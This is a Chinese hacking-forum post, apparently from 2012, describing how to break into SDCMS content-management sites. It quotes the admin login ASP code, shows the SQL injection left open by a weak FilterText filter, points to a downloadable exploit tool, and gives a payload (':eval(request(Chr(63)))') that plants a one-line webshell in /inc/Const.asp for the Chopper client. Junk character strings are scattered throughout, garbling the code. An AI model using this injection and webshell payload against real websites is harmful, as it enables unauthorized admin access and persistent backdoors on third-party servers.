作者:T00LS 鬼哥" z6 S3 i% D4 X: \; F- S
漏洞文件:后台目录/index.asp: {4 `0 N: q% l: N/ [" \, N$ l
9 q5 F; p6 }1 D7 ?8 rSub Check0 l! |. o" [4 J M l
Dim username,password,code,getcode,Rs$ q" u3 n- I) W0 `& Y
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
8 F& s' r) v p/ [* w username=FilterText(Trim(Request.Form("username")),1)
8 {7 B7 R) V3 l I6 E: ~' w* J password=FilterText(Trim(Request.Form("password")),1)
- ^3 Y! l- s$ s" ~; D4 S) L& A: y% J& L code=Trim(Request.Form("yzm"))( T: l8 X# L& ~- ]) \
getcode=Session("SDCMSCode") i! }) F& `; Y& o" a- u6 v- ]& @
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died3 T2 K% ^+ `$ B7 V3 ^1 r
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
- K+ s4 |8 \' T6 X, Z IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied+ o! t; V! \2 G- o" G0 L* O; {5 S
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
; K% @" z- f* Q8 N( g) G n, y IF username="" or password="" Then
7 I& v& q9 n" J9 u, E8 [/ D Echo "用户名或密码不能为空"ied8 ?3 u$ q$ y' {
Else6 K0 ?" ?' E4 n( q8 Z/ Q! Y
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
) m; k1 p2 [, X' I IF Rs.Eof Then
) L3 G) P# u7 h6 G' O4 r AddLog username,GetIp,"登录失败",1
* |9 R0 `5 I5 L; h' b Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会" A4 i w7 m! V: r* p. K
Else
' c/ T1 }6 H+ A+ v% r, R5 D& ~ Add_Cookies "sdcms_id",Rs(0)
8 }& ~2 L/ y; I, Y& d4 U- \ Add_Cookies "sdcms_name",username S) D7 }+ a) J' V, B
Add_Cookies "sdcms_pwd",Rs(2)) P4 [* |, ^+ W5 |; D0 E0 N
Add_Cookies "sdcms_admin",Rs(3)1 S3 [4 ~' c0 [4 Q$ D
Add_Cookies "sdcms_alllever",Rs(4)
1 o1 W5 S; F$ L6 m) X! j: h Add_Cookies "sdcms_infolever",Rs(5)( ?- E# I2 s2 e" f6 s
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
, P9 k' C/ ~6 V AddLog username,GetIp,"登录成功",1
5 f* x5 d* ?- H G2 C '自动删除30天前的Log记录 {" S1 d& m/ a2 n3 K2 |8 `" T5 E
IF Sdcms_DataType Then/ M* D3 p( k$ S# P% _. e4 c& M6 M
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")& S& R8 r% ]4 c
Else
% h; c9 O& D O: |3 ]! p Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
8 U+ c2 a$ ?8 n* }+ j2 ^+ l% Z! w End IF( t. ]1 s. V2 F' R) L' b# ~# m
Go("sdcms_index.asp")
; g+ a. K' V4 x8 p: ?/ _. ^; C5 s End IF, Y9 z4 C8 X) m ?3 L4 c3 ~* G
Rs.Close/ V8 f1 M2 _1 `1 z" e
Set Rs=Nothing
. b N7 a3 B- i& U9 G2 z1 [ End IF9 h& q% {" L: l2 @
End Sub
$ Q: ^7 U8 j+ ? n9 c6 L1 @" r% z- [' J9 ?- D$ i
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
2 S6 L$ ^0 S# M! Q. p- C
7 W* D4 z" b- N1 P6 |( B, UFunction FilterText(ByVal t0,ByVal t1)
8 H, m) P7 n! n1 N8 U IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function2 z- T& i& S+ `( e0 R
t0=Trim(t0)- B+ l4 F7 o I7 `" \
Select Case t1- S1 l% H! ~9 h; X8 j, ~( d W
Case "1"
: w/ A$ H% {! Z, ?. @ t0=Replace(t0,Chr(32),"")( ~' b5 h2 a$ i+ g, K, ]
t0=Replace(t0,Chr(13),""); g. J, M% Z0 t
t0=Replace(t0,Chr(10)&Chr(10),"")" M! x$ T2 w/ T/ S" e
t0=Replace(t0,Chr(10),"")1 d; t4 s! U0 T6 y" N3 T
Case "2"3 v2 q6 p$ d& ~: M$ ]( ]! }3 J
t0=Replace(t0,Chr(8),"")'回格2 x1 o9 F. S. s- H* l% Y
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
2 Z$ a u7 `" R9 B' b t0=Replace(t0,Chr(10),"")'换行
& ? \, Z- c5 O6 u t0=Replace(t0,Chr(11),"")'tab(垂直制表符)/ s% _3 N1 M6 `$ @+ i7 D, T% U
t0=Replace(t0,Chr(12),"")'换页
0 f; i& P) p) W1 N4 f" o; k, F, Z t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
6 D3 R; D3 k S) K" B& K* r t0=Replace(t0,Chr(22),""): J. @2 e8 A6 `' W$ z" `3 J
t0=Replace(t0,Chr(32),"")'空格 SPACE
9 r- K' e( m9 j; m t0=Replace(t0,Chr(33),"")'!4 \2 I; l* m$ n) K* M
t0=Replace(t0,Chr(34),"")'"
5 n3 q0 N+ C, J4 V# o5 O2 R t0=Replace(t0,Chr(35),"")'#
; G" Q3 _' R+ [6 d/ H t0=Replace(t0,Chr(36),"")'$
) v3 g9 a: l7 o. ^' n$ I t0=Replace(t0,Chr(37),"")'%
! B/ B/ J. c# `8 r8 Q6 P( m' p! W t0=Replace(t0,Chr(38),"")'&
+ Y* t$ t' w) \* g( q' T( \5 `) Y t0=Replace(t0,Chr(39),"")''
9 B% O1 L' o* P7 C3 a2 H t0=Replace(t0,Chr(40),"")'(7 _1 ?( ]. n% `' w6 A9 a
t0=Replace(t0,Chr(41),"")')
t8 [! P) }$ B0 i t0=Replace(t0,Chr(42),"")'*
0 \+ d# u" _. E$ O9 L, ~ t0=Replace(t0,Chr(43),"")'+% g3 N. `7 p: `
t0=Replace(t0,Chr(44),"")',! {$ j0 M7 ^, Q0 J9 q0 t" k
t0=Replace(t0,Chr(45),"")'-
$ @: R' d/ w! r B5 d# Z) F! U t0=Replace(t0,Chr(46),"")'.4 H) [- ~ `4 \( z% V# x
t0=Replace(t0,Chr(47),"")'/: t6 v- @6 |+ S. A( h8 l: b9 Z2 @- ?
t0=Replace(t0,Chr(58),"")':
* B5 Q- M7 G$ f& }' R* P t0=Replace(t0,Chr(59),"")';
" L8 C! i2 j2 T t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
. I* U' P% |& X4 b& J5 M2 j t0=Replace(t0,Chr(63),"")'?, @+ t z% K2 g; ~8 v
t0=Replace(t0,Chr(64),"")'@
1 A/ ^ m {/ {5 E) n t0=Replace(t0,Chr(91),"")'\2 m8 D7 j9 j' X3 J0 d
t0=Replace(t0,Chr(92),"")'\
j6 G$ A" L: R3 h8 w7 ? t0=Replace(t0,Chr(93),"")']
, {; N! T& d! L- a3 E3 x0 G- ] t0=Replace(t0,Chr(94),"")'^
2 [4 z" z2 c; ^ t0=Replace(t0,Chr(95),"")'_
# E: _& ?* L5 o t0=Replace(t0,Chr(96),"")'`
+ p( T$ W5 Z) x4 A) t t0=Replace(t0,Chr(123),"")'{0 r* L r( f: K$ Z
t0=Replace(t0,Chr(124),"")'|
. C' j% _4 |' r! V" x7 | t0=Replace(t0,Chr(125),"")'}8 i$ i X% [/ i/ ?& X
t0=Replace(t0,Chr(126),"")'~
/ m5 x; H4 F2 E Case Else; x$ J# e1 H4 k& X' ? A
t0=Replace(t0, "&", "&")3 d6 }9 z) g' J
t0=Replace(t0, "'", "'")
( ]5 L$ A! k1 Z6 p) u' n: D t0=Replace(t0, """", """)
/ s- ?' n; E4 F# y$ G' i t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")/ D# p" S p |
End Select
3 q. o: z1 f( t* O( e/ v IF Instr(Lcase(t0),"expression")>0 Then) q" Q& h3 @& _: `, g
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
1 U& l8 q8 R2 r End If
6 U3 A& ] v2 k* M FilterText=t0
# d/ b. S" A/ z) S4 MEnd Function
, m* ?3 |+ _: B4 d" H/ i8 O( u/ I R& A9 |+ T6 [( e: J) O
看到没。直接参数是1 只过滤' p( w1 _: T7 A, Z
t0=Replace(t0,Chr(32)," ")
# k# @# [' Z0 ^( L0 u t0=Replace(t0,Chr(13),"")
, a/ y8 {+ J: I* W0 R y t0=Replace(t0,Chr(10)&Chr(10),"
7 b( }/ F5 j. B! `2 u4 Z")
: i* q( N& u M- {) v: J; x t0=Replace(t0,Chr(10),"6 t* `+ [ n4 o7 r' G6 K
")# T" A9 P7 o4 X, N, O1 D, A5 G' U' N! x
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!4 B- P6 e% d, k
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP. ~4 P; U# b/ q0 I0 }$ u# n
" n. e+ a* K7 u' i N* e7 A
测试:% w2 F/ V M- s W& A9 F; O
7 p( `6 L! ?$ C7 F4 b9 }% V( E. W; \" b$ @ l$ ^4 ^+ B
现在输入工具上验证码,然后点OK
5 S3 R' N$ P/ f+ ~5 M) n1 A3 A+ J; r3 M4 d/ ]! o1 u W
) y$ y3 z3 u/ @8 h# R1 |看到我们直接进入后台管理界面了,呵呵!3 a4 b0 T3 J" Y& E7 P$ g! B% K! N
`. W$ }) q/ T: k& P
, X! ~6 L' o; V$ |* q" s
8 o% N* c5 G' P8 y1 X- V
这样直接进入后台了。。。。
4 ]. Q. h' S: X" N! S5 h
- h a8 ], k6 [% C; k, J( v) f 9 ^8 I. } k! Q+ J
y9 _3 S( H3 a2 e+ M2 I4 H1 d
SDCMS提权:
" Y! G2 ~/ e7 e; Q+ S; i. H( ]# I0 D3 }
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?2 u6 t) `$ \& n( v0 F
8 N5 Z% h6 i6 h: m+ v4 F$ B6 ?0 }# {6 Q+ T$ ~+ W
1 N1 h7 `9 t# I9 n( |! COK,现在用菜刀连接下!
( Q6 a8 S- J" C0 U; Z
" q0 w' K; K* c1 t. m( f5 i; B+ F
# z2 A$ R4 Z+ P# B$ q8 A
* y) k" R- C, F' }2 v+ x6 `9 v r# j( N/ u0 J% \9 z9 W
|
发表于 2012-11-9 20:57:02
收藏
支持
反对